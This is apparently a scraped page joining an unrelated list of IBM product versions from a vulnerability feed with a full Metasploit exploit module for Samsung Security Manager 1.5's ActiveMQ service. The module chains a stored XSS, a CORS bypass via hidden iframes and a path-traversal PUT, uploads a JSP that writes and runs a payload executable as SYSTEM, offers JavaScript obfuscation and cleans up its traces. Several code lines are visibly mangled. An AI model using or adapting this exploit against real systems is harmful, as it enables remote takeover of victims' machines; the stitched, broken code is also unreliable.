IBM InfoSphere Streams 3.1.0.8
IBM InfoSphere Streams 3.0.0.6
IBM InfoSphere Streams 2.0.0.4
IBM InfoSphere Streams 1.2.1.0
IBM Image Construction and Composition Tool 2.3.2.0
IBM Image Construction and Composition Tool 2.3.1.0
IBM ILOG Optimization Decision Manager Enterprise 3.7.0.2
IBM ILOG Optimization Decision Manager Enterprise 3.6
IBM ILOG Optimization Decision Manager Enterprise 3.5
IBM i 7.3
IBM i 7.2
IBM i 7.1
IBM i 6.1
IBM Explorer for z/OS 3.0
IBM eDiscovery Analyzer 2.2.2
IBM eDiscovery Analyzer 2.2.1
IBM eDiscovery Analyzer 2.2
IBM Decision Optimization Center 3.8.0.2
IBM Decision Optimization Center 3.8
IBM CPLEX Optimization Studio 12.6.3
IBM CPLEX Optimization Studio 12.6.1
IBM CPLEX Optimization Studio 12.5.1
IBM CPLEX Optimization Studio 12.6.0.1
IBM CPLEX Optimization Studio 12.6
IBM CPLEX Optimization Studio 12.5.0.1
IBM CPLEX Optimization Studio 12.5
IBM CPLEX Optimization Studio 12.4.0.1
IBM CPLEX Optimization Studio 12.4
IBM CPLEX Enterprise Server 12.6.3
IBM CPLEX Enterprise Server 12.6.1
IBM CPLEX Enterprise Server 12.5.1
IBM CPLEX Enterprise Server 12.6.0.1
IBM CPLEX Enterprise Server 12.6
IBM CPLEX Enterprise Server 12.5.0.1
IBM CPLEX Enterprise Server 12.5
IBM CPLEX Enterprise Server 12.4.0.1
IBM CPLEX Enterprise Server 12.4
IBM Cloud Manager with Openstack 4.3
IBM Cloud Manager with Openstack 4.2
IBM Cloud Manager with Openstack 4.1
IBM Cloud Manager with Openstack 4.3.0.6
IBM Cloud Manager with Openstack 4.3.0.4
IBM Cloud Manager with Openstack 4.3.0.3
IBM Cloud Manager with Openstack 4.3.0.2
IBM Cloud Manager with Openstack 4.3.0.1
IBM Cloud Manager with Openstack 4.2.0.3 Interix Fix
IBM Cloud Manager with Openstack 4.2.0.2
IBM Cloud Manager with Openstack 4.2.0.1
IBM Cloud Manager with Openstack 4.1.0.5 Interim Fix
IBM Cloud Manager with Openstack 4.1.0.4
IBM Cloud Manager with Openstack 4.1.0.3
IBM Cloud Manager with Openstack 4.1.0.2
IBM Cloud Manager with Openstack 4.1.0.1
IBM Aix 7.2
IBM AIX 7.1
IBM AIX 6.1
IBM AIX 5.3 Not Vulnerable: IBM Security Access Manager for Web 8.0.1.4
IBM Security Access Manager for Mobile 8.0.1.4
IBM Security Access Manager 9.0.1.0
IBM Notes Standard Client 9.0.1 FP6
IBM Java SDK 8 SR 3
IBM Java SDK 8 SR 2 FP 14
IBM Java SDK 7R1 SR 3 FP 40
IBM Java SDK 7 SR 9 FP 40
IBM Java SDK 7 SR 9 FP 32
IBM Java SDK 6R1 SR 8 FP 25
IBM Java SDK 6R1 SR 8 FP 21
IBM Java SDK 6 SR 16 FP 25
IBM Java SDK 6 SR 16 FP 22


SecurityFocus Vulnerabilities

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::FileDropper

def initialize(info=)
super(update_info(info,
'Name' => "Samsung Security Manager 1.5 ActiveMQ Broker Service PUT Method Remote Code Execution",
'Description' => %q
This is an exploit against Samsung Security Manager that bypasses the patch in
CVE-2015-3435 by exploiting the vulnerability against the client side. This exploit has
been tested successfully against IE, FireFox and Chrome by abusing a GET request XSS to
bypass CORS and reach the vulnerable PUT. Finally, a traversal is used in the PUT request
to upload the code just where we want it and gain Remote Code Execution as SYSTEM.
,
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <mr_me[at]offensive-security.com>', # vuln + module
],
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'Platform' => 'win',
'Targets' =>
[
# tested on 1.32, 1.4 & 1.5
[ 'Samsung Security Manager 1.32, 1.4 & 1.5 Universal', ],
],
'DisclosureDate' => "Aug 05 2016",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
], self.class)
end

# this is because String.fromCharCode has a max of 65535 func args
# thanks to sinn3r for his help with the Array->String conversion
def encode_js(string)
i = 0
encoded_0 = []
encoded_1 = []
string.each_byte do |c|
if i > 65534
encoded_1 << c
else
encoded_0 << c
end
i += 1
end
if i > 65534
return encoded_0 * ",", encoded_1 * ","
else
return encoded_0 * ","
end
end

# tested on Firefox v46.0.1 (latest)
# tested on Chrome v50.0.2661.102 (latest release)
# tested on IE v11.0.9600.18314 (latest)
def on_request_uri(cli, request)

js_name = rand_text_alpha(rand(10)+5) + '.js'

payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/" + js_name

# we deliver the JavaScript code that does the work for us
if (request.uri.match(/.js/))
return if ((p = regenerate_payload(cli)) == nil)

# dont exploit again otherwise we get a zillion shells
return if session_created? or @exploited

jsp_name = rand_text_alpha(rand(10)+5) + '.jsp'
exe_name = rand_text_alpha(rand(10)+5) + '.exe'

# clean just the jsp, because the exe dropper will be in use
register_files_for_cleanup("../../webapps/admin/#jsp_name")

# our jsp upload, ensuring native code execution
jsp = %Q|<%@ page import="java.io.*" %>
<%
ByteArrayOutputStream buf = new ByteArrayOutputStream();
BufferedReader reader = request.getReader();
int tmp;
while ((tmp = reader.read()) != -1) buf.write(tmp);
FileOutputStream fostream = new FileOutputStream("#exe_name");
buf.writeTo(fostream);
fostream.close();
Runtime.getRuntime().exec("#exe_name");
%>|

# encode the payloads
encoded_exe = encode_js(generate_payload_exe(code: payload.encoded))
encoded_jsp = encode_js(jsp)

# targets
jsp_uri = "http://localhost:8161/fileserver/..%5c%5cadmin%5c%5c#jsp_name"
upload_uri = "http://localhost:8161/admin/#jsp_name"

# this code does the PUT, then uploads/exec native code and then cleans the XSS out :->
js_content = %Q|

function do_put(uri, file_data)
var file_size = file_data.length;
var xhr = new XMLHttpRequest();
xhr.open("PUT", uri, true);
var body = file_data;
xhr.send(body);
return true;

function do_upload(uri, file_data) {
var file_size = file_data.length;
var xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);
var body = file_data;

// latest ff doesnt have sendAsBinary(), so we redefine it
if(!xhr.sendAsBinary)
xhr.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 0xff;

var ords = Array.prototype.map.call(datastr, byteValue);
var ui8a = new Uint8Array(ords);
this.send(ui8a.buffer);
}
}
xhr.sendAsBinary(body);
return true;
}

function bye_bye_xss(uri)
var xhr = new XMLHttpRequest();
xhr.open('GET', uri.replace(/\+/g,"%2b"), true);
xhr.send();

function clean_up()
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
var els = xhr.responseXML.getElementsByTagName("a");
for (var i = 0, l = els.length; i < l; i++) {
var el = els[i];
if (el.href.search("http://localhost:8161/admin/deleteDestination.action") == 0) {
bye_bye_xss(el.href);

}
}
}
xhr.open('GET', 'http://localhost:8161/admin/queues.jsp', true);
xhr.responseType = "document"; // so that we can parse the reponse as a document
xhr.send(null);
}

function exploit()
do_upload('#{upload_uri', String.fromCharCode(#encoded_exe[0]) + String.fromCharCode(#encoded_exe[1]));
clean_up();
}

function start()
do_put('#{jsp_uri', String.fromCharCode(#encoded_jsp));
setTimeout(exploit(), 2000); // timing is important
}
start();
|

if datastore['OBFUSCATE']
js_content = ::Rex::Exploitation::JSObfu.new(js_content)
js_content.obfuscate
end

print_status("Sending javascript...")
@exploited = true
send_response_html(cli, js_content, 'Content-Type' => 'application/javascript' )
return
end

if datastore['OBFUSCATE']
js_content = ::Rex::Exploitation::JSObfu.new(js_content)
js_content.obfuscate
onlick = ::Rex::Exploitation::JSObfu.new(onlick)
onlick.obfuscate
end

iframe_injection = ""
# done so that we can ensure that we hit our payload, since iframes load very fast, we need a few
(1..20).step(1) do |n|
iframe_injection << "<iframe src=\"http://localhost:8161/admin/queueGraph.jsp\" width=\"0\" height=\"0\"></iframe>"
end

# the stored XSS endpoint
target = "http://localhost:8161/admin/browse.jsp?JMSDestination="

# we use XSS to execute JavaScript code in local context to avoid CORS
xss_injection = "\"+eval(\"var a=document.createElement('script');a.type='text/javascript';"
xss_injection << "a.src='#payload_url';document.body.appendChild(a)\")+\""
target << Rex::Text.uri_encode(xss_injection)

# we can bypass Access-Control-Allow-Origin (CORS) in all browsers using iframe since it makes a GET request
# and the response is recieved in the page (even though we cant access it due to SOP) which then fires the XSS
html_content = %Q|
<html>
<body>
<iframe src="#target" width="0" height="0"></iframe>
#iframe_injection
</body>
</html>
|
print_status("Sending exploit...")
send_response_html(cli, html_content)
handler(cli)
end
end


Exploit Files ≈ Packet Storm